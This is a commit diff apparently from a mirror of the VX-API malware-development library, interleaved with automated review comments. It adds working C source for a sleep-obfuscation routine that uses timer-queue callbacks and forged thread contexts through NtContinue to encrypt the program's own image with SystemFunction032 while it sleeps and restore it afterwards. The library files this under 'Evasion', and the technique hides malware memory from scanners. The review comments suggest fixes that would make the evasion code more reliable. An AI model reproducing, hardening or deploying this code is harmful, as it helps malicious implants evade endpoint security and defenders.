mirror of https://github.com/vxunderground/VX-API
parent
f107fe43a3
commit
d5ed074515
|
@ -20,3 +20,6 @@ x64/Debug/VX-API.exe
|
|||
*.xml
|
||||
*.sarif
|
||||
*.lastcodeanalysissucceeded
|
||||
*.iobj
|
||||
*.ipdb
|
||||
*.exe
|
||||
|
|
|
@ -80,6 +80,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| RemoveDllFromPeb | rad9800 | Evasion |
|
||||
| HookEngineRestoreHeapFree | rad9800 | Evasion |
|
||||
| HookEngineUnhookHeapFree | rad9800 | Evasion |
|
||||
| SleepObfuscationViaVirtualProtect | 5pider | Evasion |
|
||||
| GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
|
||||
| GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
|
||||
| GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
|
||||
|
@ -120,6 +121,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| IsRegistryKeyValid | smelly__vx | Helper Functions |
|
||||
| FastcallExecuteBinaryShellExecuteEx | smelly__vx | Helper Functions |
|
||||
| GetCurrentProcessIdFromOffset | RistBS | Helper Functions |
|
||||
| GetPeBaseAddress | smelly__vx | Helper Functions |
|
||||
| GetKUserSharedData | Geoff Chappell | Library Loading |
|
||||
| GetModuleHandleEx2 | smelly__vx | Library Loading |
|
||||
| GetPeb | 29a | Library Loading |
|
||||
|
|
|
@ -31,6 +31,7 @@ typedef NTSTATUS(NTAPI* NTWAITFORSINGLEOBJECT)(HANDLE, BOOL, PLARGE_INTEGER);
|
|||
typedef NTSTATUS(NTAPI* RTLQUEUEWORKITEM)(PRTL_WORK_ITEM_ROUTINE, PVOID, ULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLREGISTERWAIT)(PHANDLE, HANDLE, WORKERCALLBACKFUNC, PVOID, ULONG, ULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLDEREGISTERWAITEX)(HANDLE, HANDLE);
|
||||
typedef NTSTATUS(NTAPI* NTCONTINUE)(PCONTEXT, BOOL);
|
||||
|
||||
|
||||
|
||||
|
@ -60,4 +61,12 @@ typedef HRESULT(WINAPI* DSCOPYFROMSHAREDFILE)(LPCWSTR, LPCWSTR);
|
|||
/*******************************************
|
||||
SHELL32 IMPORT
|
||||
*******************************************/
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
typedef HRESULT(WINAPI* DLLGETCLASSOBJECT)(REFCLSID, REFIID, LPVOID*);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
ADVAPI32 IMPORT
|
||||
*******************************************/
|
||||
|
||||
typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
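Review bot: The new `NTCONTINUE` and `SYSTEMFUNCTION032` typedefs carry no comment saying which undocumented prototypes they mirror, and `NTCONTINUE` declares its second parameter as `BOOL` where ntdll's `NtContinue(PCONTEXT ContextRecord, BOOLEAN TestAlert)` takes a one-byte `BOOLEAN`; harmless under the x64 register convention, but worth recording. I would put `// NtContinue(PCONTEXT ContextRecord, BOOLEAN TestAlert) - undocumented ntdll export` above the `NTCONTINUE` line and `// SystemFunction032(PUSTRING Data, PUSTRING Key) - RC4 in place, both lengths are byte counts; undocumented cryptsp/advapi32 export` above the `SYSTEMFUNCTION032` line. The `DLLGETCLASSOBJECT` typedef appears twice in the second hunk; if both copies are on the new side, the second is a redundant redeclaration and should be dropped.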
|
|
@ -0,0 +1,14 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HMODULE GetPeFileBaseAddress(VOID)
|
||||
{
|
||||
PPEB Peb = GetPebFromTeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if (!Module)
|
||||
return NULL;
|
||||
|
||||
return (HMODULE)(Module->BaseAddress ? Module->BaseAddress : NULL);
|
||||
}
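Review bot: The `if (!Module)` guard is ineffective because `Module` is computed as `Flink - 16`, which can only be NULL if the list pointer happened to equal 16, while the pointers that can genuinely be NULL, `Peb` and `Peb->LoaderData`, are dereferenced unchecked two lines earlier; move the guard in front of that line as `if (Peb == NULL || Peb->LoaderData == NULL) return NULL;`. The ternary `Module->BaseAddress ? Module->BaseAddress : NULL` yields the same value on both arms and can be plain `return (HMODULE)Module->BaseAddress;`. The literal `16` is the x64 offset of the in-memory-order links inside the loader entry and assumes that layout; `CONTAINING_RECORD(..., <struct behind PLDR_MODULE>, <links member>)` with the project's real field name would document the intent and remove the magic number.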
|
|
@ -3,7 +3,7 @@
|
|||
DWORD HashStringDjb2A(_In_ PCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c;
|
||||
INT c = 0;
|
||||
|
||||
while (c = *String++)
|
||||
Hash = ((Hash << 5) + Hash) + c;
|
||||
|
@ -14,7 +14,7 @@ DWORD HashStringDjb2A(_In_ PCHAR String)
|
|||
DWORD HashStringDjb2W(_In_ PWCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
INT c;
|
||||
INT c = 0;
|
||||
|
||||
while (c = *String++)
|
||||
Hash = ((Hash << 5) + Hash) + c;
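Review bot: Initialising `c` does not address the real smell in both `HashStringDjb2A` and `HashStringDjb2W`: the loop condition `while (c = *String++)` is an assignment inside a condition, which MSVC flags (C4706) and which reads like a typo for `==`; `while ((c = *String++) != 0)` keeps the behaviour and is explicit, and applies to both hunks of this file. In the A variant `*String++` is a `char`, signed under MSVC, so bytes above 0x7F are sign-extended into `c` and the result diverges from canonical DJB2 over unsigned bytes; `c = (UCHAR)*String++` would fix that, but only if no stored hashes of non-ASCII names depend on the current values. Both function bodies continue below their hunks.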
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
VOID HeapFreeInterceptionRoutine(PEXCEPTION_POINTERS ExceptionInfo)
|
||||
{
|
||||
CONST DWORD dwSize = HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);
|
||||
CONST DWORD dwSize = (DWORD)HeapSize((HANDLE)ExceptionInfo->ContextRecord->Rcx, (DWORD)ExceptionInfo->ContextRecord->Rdx, (LPCVOID)ExceptionInfo->ContextRecord->R8);
|
||||
|
||||
if (dwSize)
|
||||
ZeroMemoryEx((PVOID)ExceptionInfo->ContextRecord->R8, dwSize);
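Review bot: The `(DWORD)` cast on the `HeapSize` line silences the truncation warning without handling the call's failure value: `HeapSize` returns `SIZE_T` and reports failure as `(SIZE_T)-1`, which truncates to `0xFFFFFFFF`, passes the `if (dwSize)` test and hands a 4 GiB length to `ZeroMemoryEx`, i.e. a wild write over the block being freed. Keep the full width and test the sentinel: `CONST SIZE_T cbSize = HeapSize(/* same three arguments */);` then `if (cbSize != 0 && cbSize != (SIZE_T)-1)` and pass `cbSize` on (assuming `ZeroMemoryEx` accepts a `SIZE_T`; if it only takes a `DWORD`, additionally reject sizes above `MAXDWORD`). The routine's body continues outside the hunk.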
|
||||
|
|
|
@ -1126,3 +1126,8 @@ typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoS
|
|||
|
||||
typedef DWORD(CALLBACK* PRTL_WORK_ITEM_ROUTINE)(LPVOID);
|
||||
|
||||
typedef struct AMBIGUOUS_STRING {
|
||||
DWORD Length;
|
||||
DWORD MaximumLength;
|
||||
PUCHAR Buffer;
|
||||
}AB_STRING, * PAB_STRING;
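Review bot: `AMBIGUOUS_STRING` is introduced without a comment explaining what it models, so a reader cannot tell why `Length` and `MaximumLength` are `DWORD` and `Buffer` is `PUCHAR`. It matches the undocumented `USTRING` that `SystemFunction032` consumes (two ULONG byte lengths followed by a `PUCHAR`, no terminator); I would add `// Layout of the undocumented USTRING consumed by SystemFunction032: byte lengths, no NUL terminator` above the `typedef struct` line. On x64 the callers rely on the 16-byte layout, so `static_assert(sizeof(AB_STRING) == 16, "USTRING layout");` after the typedef would pin it.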
|
||||
|
|
|
@ -37,8 +37,10 @@ int main(VOID)
|
|||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
|
||||
__demonstration_WinMain();
|
||||
|
||||
//hasha(NtMapViewOfSection);
|
||||
UCHAR KeyBuf[17] = { 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x00};
|
||||
|
||||
SleepObfuscationViaVirtualProtect(4000, KeyBuf);
|
||||
|
||||
return dwError;
|
||||
}
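Review bot: The demo key `KeyBuf[17]` and the literal `17` hard-coded inside `SleepObfuscationViaVirtualProtect` (`BinaryKey.Length = BinaryKey.MaximumLength = 17;` in that file's hunk) are coupled only by convention; a shorter array in a future caller becomes an over-read of the key. Either give the callee a length parameter or expose one shared constant, and pass `sizeof KeyBuf` from here. The trailing `0x00` is part of the 17-byte key as written, which looks unintended and should at least be documented. The commented-out `//hasha(NtMapViewOfSection);` line is dead code and should go; `main` begins outside the hunk.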
|
||||
|
|
|
@ -0,0 +1,142 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
NTCONTINUE NtContinue = NULL;
|
||||
SYSTEMFUNCTION032 SystemFunction032 = NULL;
|
||||
HMODULE hNtdll = NULL, hAdvapi32 = NULL;
|
||||
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
HMODULE ImageBaseAddress = NULL;
|
||||
|
||||
CONTEXT ContextThread = { 0 }, RopVirtualProtectReadWrite = { 0 }, RopSystemFunction032Encryption = { 0 }, RopWaitForSingleObject = { 0 };
|
||||
CONTEXT RopSystemFunction032Decryption = { 0 }, RopVirtualProtectExecute = { 0 }, RopSetEvent = { 0 };
|
||||
AB_STRING BinaryKey = { 0 }, ImageBuffer = { 0 };
|
||||
|
||||
HANDLE hTimer = NULL, hTimerQueue = NULL, hEvent = NULL;
|
||||
|
||||
DWORD PreviousProtectionAttribute = ERROR_SUCCESS;
|
||||
|
||||
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
if (hNtdll == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hAdvapi32 = TryLoadDllMultiMethodW((PWCHAR)L"cryptsp.dll");
|
||||
if (hAdvapi32 == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
NtContinue = (NTCONTINUE)GetProcAddressA((DWORD64)hNtdll, "NtContinue");
|
||||
SystemFunction032 = (SYSTEMFUNCTION032)GetProcAddressA((DWORD64)hAdvapi32, "SystemFunction032");
|
||||
|
||||
if (!NtContinue || !SystemFunction032)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ImageBaseAddress = GetPeFileBaseAddress();
|
||||
if (ImageBaseAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, (PBYTE*)&ImageBaseAddress);
|
||||
|
||||
hEvent = CreateEventW(0, 0, 0, 0);
|
||||
if (hEvent == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hTimerQueue = CreateTimerQueue();
|
||||
if (hTimerQueue == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BinaryKey.Buffer = Key;
|
||||
BinaryKey.Length = BinaryKey.MaximumLength = 17;
|
||||
|
||||
ImageBuffer.Buffer = (PUCHAR)ImageBaseAddress;
|
||||
ImageBuffer.Length = ImageBuffer.MaximumLength = Optional->SizeOfImage;
|
||||
|
||||
if (!CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)RtlCaptureContext, &ContextThread, 0, 0, WT_EXECUTEINTIMERTHREAD))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
WaitForSingleObject(hEvent, 0x32);
|
||||
|
||||
if (CopyMemoryEx(&RopVirtualProtectReadWrite, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSystemFunction032Encryption, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopWaitForSingleObject, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSystemFunction032Decryption, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopVirtualProtectExecute, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CopyMemoryEx(&RopSetEvent, &ContextThread, sizeof(CONTEXT)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
// VirtualProtect
|
||||
RopVirtualProtectReadWrite.Rsp -= 8;
|
||||
RopVirtualProtectReadWrite.Rip = (DWORD64)VirtualProtect;
|
||||
RopVirtualProtectReadWrite.Rcx = (DWORD64)ImageBaseAddress;
|
||||
RopVirtualProtectReadWrite.Rdx = Optional->SizeOfImage;
|
||||
RopVirtualProtectReadWrite.R8 = PAGE_READWRITE;
|
||||
RopVirtualProtectReadWrite.R9 = (DWORD64)&PreviousProtectionAttribute;
|
||||
|
||||
// SystemFunction032
|
||||
RopSystemFunction032Encryption.Rsp -= 8;
|
||||
RopSystemFunction032Encryption.Rip = (DWORD64)SystemFunction032;
|
||||
RopSystemFunction032Encryption.Rcx = (DWORD64)&ImageBuffer;
|
||||
RopSystemFunction032Encryption.Rdx = (DWORD64)&BinaryKey;
|
||||
|
||||
// WaitForSingleObject
|
||||
RopWaitForSingleObject.Rsp -= 8;
|
||||
RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
|
||||
RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
|
||||
RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
|
||||
|
||||
// SystemFunction032
|
||||
RopSystemFunction032Decryption.Rsp -= 8;
|
||||
RopSystemFunction032Decryption.Rip = (DWORD64)SystemFunction032;
|
||||
RopSystemFunction032Decryption.Rcx = (DWORD64)&ImageBuffer;
|
||||
RopSystemFunction032Decryption.Rdx = (DWORD64)&BinaryKey;
|
||||
|
||||
// VirtualProtect
|
||||
RopVirtualProtectExecute.Rsp -= 8;
|
||||
RopVirtualProtectExecute.Rip = (DWORD64)VirtualProtect;
|
||||
RopVirtualProtectExecute.Rcx = (DWORD64)ImageBaseAddress;
|
||||
RopVirtualProtectExecute.Rdx = Optional->SizeOfImage;
|
||||
RopVirtualProtectExecute.R8 = PAGE_EXECUTE_READWRITE;
|
||||
RopVirtualProtectExecute.R9 = (DWORD64)&PreviousProtectionAttribute;
|
||||
|
||||
// SetEvent
|
||||
RopSetEvent.Rsp -= 8;
|
||||
RopSetEvent.Rip = (DWORD64)SetEvent;
|
||||
RopSetEvent.Rcx = (DWORD64)hEvent;
|
||||
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectReadWrite, 100, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Encryption, 200, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopWaitForSingleObject, 300, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSystemFunction032Decryption, 400, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopVirtualProtectExecute, 500, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
CreateTimerQueueTimer(&hTimer, hTimerQueue, (WAITORTIMERCALLBACK)NtContinue, &RopSetEvent, 600, 0, WT_EXECUTEINTIMERTHREAD);
|
||||
|
||||
WaitForSingleObject(hEvent, INFINITE);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6031)
|
||||
if(hTimerQueue)
|
||||
DeleteTimerQueue(hTimerQueue);
|
||||
#pragma warning( pop )
|
||||
|
||||
return bFlag;
|
||||
}
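Review bot: `RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, ...)` is called without checking its outcome, and `Optional`, initialised to NULL at the top of the function, is dereferenced a few lines later in `ImageBuffer.Length = ImageBuffer.MaximumLength = Optional->SizeOfImage;`; add `if (Optional == NULL) goto EXIT_ROUTINE;` directly after the call (or test the function's own return if it has one). The event handle is leaked: the cleanup block deletes `hTimerQueue` but never closes `hEvent`, so `if (hEvent) CloseHandle(hEvent);` belongs next to the `DeleteTimerQueue` call. The six `CreateTimerQueueTimer` calls near the end ignore their return values, and if the last one (`RopSetEvent`) is not created the `WaitForSingleObject(hEvent, INFINITE)` never returns, so each should be checked the way the first call is. `RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;` stores whatever that identifier is; if `InlineGetCurrentProcess` is a function rather than a macro for the `(HANDLE)-1` pseudo-handle, this passes the function's address as the handle, which is worth confirming against its definition. The variable `hAdvapi32` actually holds `cryptsp.dll`; naming it `hCryptsp` would stop misleading the next reader.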
|
|
@ -104,7 +104,7 @@
|
|||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -119,6 +119,7 @@
|
|||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp20</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
|
@ -181,6 +182,7 @@
|
|||
<ClCompile Include="GetOsMinorVersionFromPeb.cpp" />
|
||||
<ClCompile Include="GetOsPlatformIdFromPeb.cpp" />
|
||||
<ClCompile Include="GetPeb.cpp" />
|
||||
<ClCompile Include="GetPeFileBaseAddress.cpp" />
|
||||
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
|
||||
|
@ -244,6 +246,7 @@
|
|||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
<ClCompile Include="SetHardwareBreakpoint.cpp" />
|
||||
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
|
||||
<ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
|
|
|
@ -513,6 +513,12 @@
|
|||
<ClCompile Include="HookEngineUnhookHeapFreecpp.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPeFileBaseAddress.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -15,6 +15,7 @@
|
|||
#include <icmpapi.h>
|
||||
#include <windns.h>
|
||||
#include <tlhelp32.h>
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
|
@ -140,6 +141,13 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
|
|||
/*******************************************
|
||||
CRYPTOGRAPHY RELATED
|
||||
*******************************************/
|
||||
//#define TOKENIZE( x ) #x
|
||||
//#define CONCAT3( X, Y, Z ) X##Y##Z
|
||||
//#define HASHALGOA HashStringDjb2A
|
||||
//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
|
||||
//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
|
||||
|
||||
|
||||
DWORD HashStringDjb2A(_In_ PCHAR String);
|
||||
DWORD HashStringDjb2W(_In_ PWCHAR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
|
||||
|
@ -244,6 +252,7 @@ DWORD IsRegistryKeyValidW(_In_ HKEY PredefinedKey, _In_ PWCHAR Path);
|
|||
BOOL FastcallExecuteBinaryShellExecuteExW(_In_ PWCHAR FullPathToBinary, _In_ PWCHAR OptionalParameters);
|
||||
BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHAR OptionalParameters);
|
||||
DWORD GetCurrentProcessIdFromOffset(VOID);
|
||||
HMODULE GetPeFileBaseAddress(VOID);
|
||||
|
||||
|
||||
|
||||
|
@ -324,6 +333,7 @@ BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
|
|||
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
|
||||
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
|
||||
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
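Review bot: The block of commented-out `TOKENIZE`/`CONCAT3`/`HASHALGOA`/`hasha`/`hashw` macros under `CRYPTOGRAPHY RELATED` is dead code and should be deleted or finished rather than parked; as written the `hashw` line would also be wrong if revived, since it casts the token string to `PWCHAR` but still calls the narrow `HASHALGOA`, and `constexpr auto` cannot bind the result of the non-`constexpr` `HashStringDjb2A` in any case. If compile-time hashing is the goal it needs a `constexpr` implementation, not these macros. The new prototypes `GetPeFileBaseAddress` and `SleepObfuscationViaVirtualProtect` are undocumented; one line each, such as `// Base address of the current process image read from the PEB loader list, or NULL` and `// Blocks the caller for dwSleepTimeInMilliseconds; Key must point to 17 bytes`, would tell callers the contract.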
|
||||
|
||||
|
||||
|
||||
|
|